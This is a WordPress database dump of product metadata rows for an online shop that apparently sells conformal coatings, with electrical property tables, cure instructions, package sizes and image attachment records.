INSERT INTO `wp_postmeta` VALUES (6461, 734, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (6462, 734, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6463, 734, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6464, 734, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (6465, 734, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6466, 734, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6467, 734, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (6468, 734, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6469, 734, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6470, 734, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (6471, 734, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (6472, 734, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (6473, 735, '_edit_lock', '1498060201:3'); 
INSERT INTO `wp_postmeta` VALUES (6474, 735, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (6475, 735, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (6476, 735, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (6477, 735, '312_default_editor', '<strong>Cure Electrical Properties</strong>\r\n<table width="378">\r\n<tbody>\r\n<tr>\r\n<td width="242">Dielectric Strength, volts/mil</td>\r\n<td width="136">1200</td>\r\n</tr>\r\n<tr>\r\n<td>Dielectric Constant @ 10^5 Hz</td>\r\n<td>4.2</td>\r\n</tr>\r\n<tr>\r\n<td>Dissipation Factor @ 10^5 Hz</td>\r\n<td>0.01</td>\r\n</tr>\r\n<tr>\r\n<td>Volume Resistivity (ohm)</td>\r\n<td>2 x 10^13</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><u>Cured Physical Properties</u></strong>\r\n\r\n<strong>Operating Temperature: </strong>-67°F/-55°C to 230F/110C\r\n<strong>Appearance:</strong> No blistering, wrinkling, cracking, or peeling of film, or substrate after thermal shock, or after moisture resistance testing.\r\n<strong>Flexibility:</strong> No cracking or crazing of film on bending over a 1/8" diameter mandrel.\r\n<strong>Fungus Resistance:</strong> Non-nutrient per ASTM G21\r\n<strong>Fluorescent</strong> when viewed with ultraviolet light.\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (6478, 735, '716_default_editor', 'Allow 48 hours minimum to reach room temperature before using cans stored or received during cold weather.\r\n\r\nPost Application: Air dry for 30 minutes. Repeat up to 2-3 coats. The recommended cure schedule is 2 hours at 140°F/60°C and a relative humidity of 30% to 50%.  If the humidity level is less than 30%, place an open container of distilled water in the oven and allow to equilibrate.  The alternate cure, at room temperature and a relative humidity of 30% to 50%, will be tack free in one to four hours, semi-hard in one day, and fully cured in seven days.'); 
INSERT INTO `wp_postmeta` VALUES (6479, 735, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6480, 735, '317_default_editor', '14 oz Aerosol'); 
INSERT INTO `wp_postmeta` VALUES (6481, 735, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (6482, 735, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (6483, 735, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6484, 735, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6485, 735, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (6486, 735, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6487, 735, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (6488, 735, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (6489, 735, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (6490, 735, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (6491, 735, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (6492, 735, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6493, 735, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6494, 735, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6495, 735, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (6496, 735, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (6497, 735, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6498, 735, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (6499, 735, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6500, 735, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6501, 735, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (6502, 735, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6503, 735, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6504, 735, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (6505, 735, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6506, 735, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6507, 735, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (6508, 735, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (6509, 735, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (6510, 736, '_edit_lock', '1479958081:3'); 
INSERT INTO `wp_postmeta` VALUES (6511, 736, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (6512, 736, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (6513, 736, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (6514, 736, '312_default_editor', '<strong>Cure Electrical Properties</strong>\r\n<table width="378">\r\n<tbody>\r\n<tr>\r\n<td width="242">Dielectric Strength, volts/mil</td>\r\n<td width="136">1200</td>\r\n</tr>\r\n<tr>\r\n<td>Dielectric Constant @ 10^5 Hz</td>\r\n<td>4.2</td>\r\n</tr>\r\n<tr>\r\n<td>Dissipation Factor @ 10^5 Hz</td>\r\n<td>0.01</td>\r\n</tr>\r\n<tr>\r\n<td>Volume Resistivity (ohm)</td>\r\n<td>2 x 10^13</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><u>Cured Physical Properties</u></strong>\r\n\r\n<strong>Operating Temperature: </strong>-67°F/-55°C to 230F/110C\r\n<strong>Appearance:</strong> No blistering, wrinkling, cracking, or peeling of film, or substrate after thermal shock, or after moisture resistance testing.\r\n<strong>Flexibility:</strong> No cracking or crazing of film on bending over a 1/8" diameter mandrel.\r\n<strong>Fungus Resistance:</strong> Non-nutrient per ASTM G21\r\n<strong>Fluorescent</strong> when viewed with ultraviolet light.'); 
INSERT INTO `wp_postmeta` VALUES (6515, 736, '716_default_editor', 'Air dry for 30 minutes. Repeat up to 2-3 coats. The recommended cure schedule is 2 hours at 140°F/60°C and a relative humidity of 30% to 50%.  If the humidity level is less than 30%, place an open container of distilled water in the oven and allow to equilibrate.  The alternate cure, at room temperature and a relative humidity of 30% to 50%, will be tack free in one to four hours, semi-hard in one day, and fully cured in seven days.'); 
INSERT INTO `wp_postmeta` VALUES (6516, 736, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6517, 736, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon drum'); 
INSERT INTO `wp_postmeta` VALUES (6518, 736, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (6519, 736, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (6520, 736, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6521, 736, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6522, 736, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (6523, 736, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6524, 736, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (6525, 736, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (6526, 736, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (6527, 736, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (6528, 736, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (6529, 736, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6530, 736, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6531, 736, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6532, 736, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (6533, 736, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (6534, 736, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6535, 736, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (6536, 736, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6537, 736, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6538, 736, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (6539, 736, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6540, 736, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6541, 736, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (6542, 736, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6543, 736, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6544, 736, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (6545, 736, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (6546, 736, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (6547, 738, '_edit_lock', '1479958285:3'); 
INSERT INTO `wp_postmeta` VALUES (6548, 738, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (6549, 738, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (6550, 738, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (6551, 738, '312_default_editor', '<strong>Cure Electrical Properties</strong>\r\n<table width="378">\r\n<tbody>\r\n<tr>\r\n<td width="242">Dielectric Withstand Voltage, Volts</td>\r\n<td width="136">&gt;1500</td>\r\n</tr>\r\n<tr>\r\n<td>Dielectric Constant @ 1 MHz (77F/25C)</td>\r\n<td>3.5</td>\r\n</tr>\r\n<tr>\r\n<td>Dissipation Factor @ 1 MHz (77F/25C)</td>\r\n<td>0.028</td>\r\n</tr>\r\n<tr>\r\n<td>Insulation Resistance, ohms</td>\r\n<td>3.0 x 10^14</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Cured Physical Properties</strong>\r\n\r\n<strong>Operating Temperature: </strong>-85°F/-65°C to 257°F/125°C\r\n<strong>Appearance:</strong> No blistering, wrinkling, cracking, or peeling of film, discoloration of printed conductors or substrate after thermal shock, or after moisture resistance testing.\r\n<strong>Flexibility:</strong> No cracking or crazing of film on bending over a 3 mm diameter mandrel.\r\n<strong>Fluorescent:</strong> when viewed with ultraviolet light.'); 
INSERT INTO `wp_postmeta` VALUES (6552, 738, '716_default_editor', 'Allow 48 hours minimum to reach room temperature before using cans stored or received during cold weather.\r\n\r\nPost Application: Air dry for 30 minutes. Repeat up to 2-3 coats. The recommended cure schedule is 2 hours at 140°F/60°C and a relative humidity of 30% to 50%.  If the humidity level is less than 30%, place an open container of distilled water in the oven and allow to equilibrate.  The alternate cure, at room temperature and a relative humidity of 30% to 50%, will be tack free in one to four hours, semi-hard in one day, and fully cured in seven days.'); 
INSERT INTO `wp_postmeta` VALUES (6553, 738, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (6554, 738, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon Drum'); 
INSERT INTO `wp_postmeta` VALUES (6555, 738, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (6556, 738, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (6557, 738, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6558, 738, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6559, 738, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (6560, 738, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6561, 738, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (6562, 738, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (6563, 738, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (6564, 738, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (6565, 738, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (6566, 738, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6567, 738, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6568, 738, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6569, 738, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (6570, 738, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (6571, 738, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6572, 738, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (6573, 738, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6574, 738, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6575, 738, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (6576, 738, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6577, 738, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6578, 738, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (6579, 738, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6580, 738, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6581, 738, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (6582, 738, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (6583, 738, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (6584, 739, '_wp_attached_file', '2016/08/shutterstock_61369633.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6585, 739, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2500;s:6:"height";i:1728;s:4:"file";s:33:"2016/08/shutterstock_61369633.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_61369633-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_61369633-800x553.jpg";s:5:"width";i:800;s:6:"height";i:553;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_61369633-768x531.jpg";s:5:"width";i:768;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_61369633-1600x1106.jpg";s:5:"width";i:1600;s:6:"height";i:1106;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_61369633-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_61369633-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_61369633-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_61369633-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6586, 740, '_wp_attached_file', '2016/08/shutterstock_92852002.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6587, 740, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:33:"2016/08/shutterstock_92852002.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_92852002-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_92852002-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_92852002-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_92852002-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_92852002-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_92852002-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_92852002-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_92852002-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6597, 744, '_wp_attached_file', '2016/08/shutterstock_125931485.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6598, 744, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3300;s:6:"height";i:2156;s:4:"file";s:34:"2016/08/shutterstock_125931485.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_125931485-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_125931485-800x523.jpg";s:5:"width";i:800;s:6:"height";i:523;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_125931485-768x502.jpg";s:5:"width";i:768;s:6:"height";i:502;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_125931485-1600x1045.jpg";s:5:"width";i:1600;s:6:"height";i:1045;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_125931485-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_125931485-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_125931485-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_125931485-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6599, 745, '_wp_attached_file', '2016/08/shutterstock_300460277.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6600, 745, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5800;s:6:"height";i:4200;s:4:"file";s:34:"2016/08/shutterstock_300460277.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_300460277-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_300460277-800x579.jpg";s:5:"width";i:800;s:6:"height";i:579;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_300460277-768x556.jpg";s:5:"width";i:768;s:6:"height";i:556;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_300460277-1600x1159.jpg";s:5:"width";i:1600;s:6:"height";i:1159;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_300460277-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_300460277-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_300460277-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_300460277-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6605, 748, '_wp_attached_file', '2016/08/shutterstock_415540285.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6606, 748, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:1979;s:4:"file";s:34:"2016/08/shutterstock_415540285.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_415540285-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_415540285-800x528.jpg";s:5:"width";i:800;s:6:"height";i:528;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_415540285-768x507.jpg";s:5:"width";i:768;s:6:"height";i:507;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_415540285-1600x1055.jpg";s:5:"width";i:1600;s:6:"height";i:1055;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_415540285-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_415540285-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_415540285-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_415540285-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6607, 749, '_wp_attached_file', '2016/08/shutterstock_439560973.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6608, 749, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5200;s:6:"height";i:3250;s:4:"file";s:34:"2016/08/shutterstock_439560973.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_439560973-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_439560973-800x500.jpg";s:5:"width";i:800;s:6:"height";i:500;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_439560973-768x480.jpg";s:5:"width";i:768;s:6:"height";i:480;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_439560973-1600x1000.jpg";s:5:"width";i:1600;s:6:"height";i:1000;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_439560973-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_439560973-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_439560973-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_439560973-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6609, 642, '_thumbnail_id', '739'); 
INSERT INTO `wp_postmeta` VALUES (6610, 642, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n</ul>'); 
